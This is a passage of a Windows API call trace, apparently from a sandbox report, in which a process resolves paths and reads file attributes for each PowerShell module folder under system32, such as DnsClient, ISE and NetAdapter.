lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0159.685] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient", nBufferLength=0x3d, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient", lpFilePart=0x0) returned 0x3c [0159.685] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.685] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dnsclient"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x19ec84e, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20706767, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.686] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.686] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0159.686] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x4a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement", lpFilePart=0x0) returned 0x49 [0159.686] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.686] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\eventtracingmanagement"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a636cb, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.686] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.686] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\International", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0159.686] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\International", nBufferLength=0x41, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\International", lpFilePart=0x0) returned 0x40 [0159.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.687] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\International" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\international"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a63ff3, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.687] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0159.687] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI", nBufferLength=0x39, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI", lpFilePart=0x0) returned 0x38 [0159.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.687] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a648ba, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.688] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0159.688] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x37, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0159.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.688] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a65091, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.688] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0159.689] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds", nBufferLength=0x37, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds", lpFilePart=0x0) returned 0x36 [0159.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.689] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\kds"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a65832, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.689] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0159.689] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x50, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f [0159.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.689] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a6609c, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d025724, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.689] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0159.689] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x54, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", lpFilePart=0x0) returned 0x53 [0159.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.690] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a67503, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.690] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4d [0159.690] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x4d, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", lpFilePart=0x0) returned 0x4c [0159.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.690] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a67e99, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.691] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.691] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0159.691] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x53, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0159.691] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.691] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a686f1, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.691] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.692] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0159.692] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x53, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52 [0159.692] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.692] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1ac9e27, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d025724, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.692] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0159.692] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x51, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50 [0159.692] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.692] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1acae81, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20752c33, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.693] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0159.693] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x50, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0159.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.693] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1acb52e, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20752c33, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.693] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0159.693] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x4e, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d [0159.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.693] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1acc005, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20752c33, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.694] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.694] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0159.694] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc", nBufferLength=0x39, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc", lpFilePart=0x0) returned 0x38 [0159.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.695] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\msdtc"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1acdc29, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d025724, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.695] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\MSMQ", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0159.695] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\MSMQ", nBufferLength=0x38, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\MSMQ", lpFilePart=0x0) returned 0x37 [0159.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.695] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\MSMQ" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\msmq"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x243555cf, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x243555cf, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.697] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0159.697] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter", nBufferLength=0x3e, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter", lpFilePart=0x0) returned 0x3d [0159.697] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.697] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netadapter"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1acff90, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2079f100, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.698] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0159.698] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection", nBufferLength=0x41, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection", lpFilePart=0x0) returned 0x40 [0159.698] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.698] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netconnection"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1bb671a, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2079f100, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.698] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.698] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x49 [0159.698] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture", nBufferLength=0x49, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture", lpFilePart=0x0) returned 0x48 [0159.698] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.698] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\neteventpacketcapture"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1bb70fa, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x207c536a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.698] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.699] GetFullPathNameW (in: 